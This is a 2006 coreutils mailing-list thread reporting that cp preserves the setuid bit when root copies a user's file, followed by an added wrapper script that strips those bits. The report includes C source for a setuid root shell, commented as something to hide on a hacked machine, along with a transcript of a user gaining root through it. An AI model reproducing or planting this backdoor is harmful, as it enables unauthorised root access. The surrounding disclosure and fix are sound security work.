bug-coreutils
Re: Permissions over suid files


From: Crg
Subject: Re: Permissions over suid files
Date: Mon, 2 Oct 2006 16:38:29 +0200

Hmm, I was checking the source code ... and it seems it is the kernel syscall
that removes the suid when you do a chown ...

2006/10/2, Pedro Andujar <address@hidden>:
Hello,

When root copies a non-privileged user's file that has the suid bit on,
the file gets "chowned" to root and the suid bit is not removed.

That could mean a security compromise.

Example:

address@hidden ~]$ cat > c.c
/* Suid shell || uid=0(root) gid=0(root) || You compile it and hide it
 * on the hacked machine. Then: "chmod 6755 suidshell", all of
 * this as root. Crg
*/

#include <stdio.h>
#define root 0

main()
{
    system("clear");
    printf("Now you are r00t!!\n\n");
    seteuid(root);
    setuid(root);
    setgid(root);
/* change "/bin/bash" to "/bin/sh" if the system does not have bash */
    system("/bin/bash");
}


address@hidden ~]$ make c
cc     c.c   -o c
address@hidden ~]$ chmod 6755 c


**now root**

address@hidden tmp]# cp /home/pandujar/c ./
address@hidden tmp]# ls -l c
-rwsr-sr-x  1 root root 5172 Oct  2 16:13 c


**user again**

address@hidden ~]$ /tmp/c


Now you are r00t!!

address@hidden ~]#


Other tools like "chown" have this kind of protection:

address@hidden tmp]# cd /home/pandujar/
address@hidden pandujar]# ls -l c
-rwsr-sr-x  1 pandujar tiger 5172 Oct  2 16:13 c
address@hidden pandujar]# chown root.root c
address@hidden pandujar]# ls -l c
-rwxr-xr-x  1 root root 5172 Oct  2 16:13 c
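
The protection the report asks for, written as a copy wrapper. This is an added example, not part of the original message and not coreutils code; `copy_nosuid` and `has_privbits` are hypothetical names, and GNU `stat` is assumed.

```shell
#!/bin/sh
# Added example (not coreutils code). copy_nosuid and has_privbits are
# hypothetical helper names; GNU stat(1) is assumed for `stat -c %a`.

# has_privbits FILE: succeeds if FILE carries set-user-ID or set-group-ID.
has_privbits() {
    [ -u "$1" ] || [ -g "$1" ]
}

# copy_nosuid SRC DST: copy a regular file so that the copy never appears
# at DST with set-user-ID/set-group-ID set. Runs in a subshell so its
# variables stay local.
copy_nosuid() (
    src=$1
    dst=$2
    if [ ! -f "$src" ] || [ -L "$src" ]; then
        echo "copy_nosuid: $src: not a regular file" >&2
        return 1
    fi
    # Like cp, treat an existing directory as "copy into it".
    if [ -d "$dst" ]; then
        dst=$dst/$(basename -- "$src")
    fi
    # Keep only the rwx bits of the source mode (drops 04000 and 02000).
    mode=$(stat -c '%a' -- "$src") || return 1
    perm=$(printf '%o' "$(( 0$mode & 0777 ))")
    # mktemp creates the staging file with mode 0600 next to the target,
    # so nobody else can execute it while the data is being written.
    tmp=$(mktemp "$(dirname -- "$dst")/.copy_nosuid.XXXXXX") || return 1
    if cp -- "$src" "$tmp" && chmod "$perm" "$tmp" && mv -f -- "$tmp" "$dst"
    then
        return 0
    fi
    rm -f -- "$tmp"
    return 1
)
```

Run as root on the 6755 file from the report, this leaves a root-owned copy with mode 755, the same result the `chown` listing above shows.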




